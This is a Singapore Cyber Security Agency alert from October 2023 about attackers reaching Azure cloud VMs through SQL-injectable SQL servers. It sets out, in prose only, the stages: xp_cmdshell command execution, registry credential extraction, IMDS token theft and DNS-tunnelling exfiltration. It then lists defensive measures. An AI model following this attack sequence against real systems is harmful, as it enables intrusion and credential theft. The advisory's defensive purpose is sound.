Skip to main content

Public advisory of scammers impersonating CSA and the SPF

Stay vigilant. Read the public advisory

Cyber Security Agency of Singapore
  1. Home
  2. Alerts & Advisories
  3. Alerts
  4. Ongoing Attacks Against Microsoft Azure Cloud Virtual Machines
Alerts

Ongoing Attacks Against Microsoft Azure Cloud Virtual Machines

9 October 2023

Microsoft has discovered attackers attempting to gain access to cloud environments through vulnerable Microsoft SQL servers that are susceptible to SQL injection.

The modus operandi of the attacks include, but are not limited to:

  1. Initial Access: Performing SQL injection attack onto vulnerable Microsoft SQL servers

  2. Data Collection: Collecting sensitive information such as database details and users' permissions

  3. Execution: Executing 'xp_cmdshell' command and executing operating system commands through SQL which provides them with a shell

  4. Persistence: Creating scheduled tasks

    1. Exfiltration: Retrieving data using webhook and DNS tunneling

    2. Credential Access: Extracting registry keys such as Security Accounts Manager (SAM) and Security

    3. Lateral Movement: Accessing Instant Metadata Service (IMDS) to retrieve cloud identity token to access external cloud resources

  5. Defense Evasion: Removing any downloaded scripts and modifications to temporary databases

Users and administrators are advised to stay vigilant and adopt the following measures to defend against such attacks:

  • Apply Principle of Least Privilege
    Grant necessary access rights and permissions to users, processes and systems based on their role requirements.

  • Enforce Input Sanitisation
    Sanitise every user's input to mitigate any possible threats such as SQL injection and cross-site-scripting attacks.

  • Perform Threat Hunting
    Use reputable threat hunting tools to detect threats proactively in order to improve security posture of the system. These threat hunting tools may be used to perform queries to detect instances of a SQL Server process running a shell to execute one or multiple suspicious commands.

  • Use Cloud-Native Application Protection Platform (CNAPP)
    CNAPP is a tool used to streamline the process of monitoring, identifying, and responding to potential cloud security risks and weaknesses. Using CNAPP will allow users and administrators to identify and address potential vulnerabilities in the databases. Additionally, it could be used to detect suspicious activities such as lateral movement.

  • Deploy Endpoint Detection and Response (EDR)
    Deploy EDR to prevent, identify, investigate, and respond to sophisticated threats such as the possible exploitation of SQL injection using 'xp_cmdshell' command.

  • Authenticate All Users
    Enforce the use of authentication protocols for users' identity verification.

  • Update Systems and Servers Promptly
    Users and administrators are advised to update their systems and servers to the latest version.

For more information on securing Application Programming Interfaces, please refer to our advisory here.

More information is available here:
https://www.bleepingcomputer.com/news/security/microsoft-hackers-target-azure-cloud-vms-via-breached-sql-servers/?mibextid=Zxz2cZ
https://www.microsoft.com/en-us/security/blog/2023/10/03/defending-new-vectors-threat-actors-attempt-sql-server-to-cloud-lateral-movement/

Back to top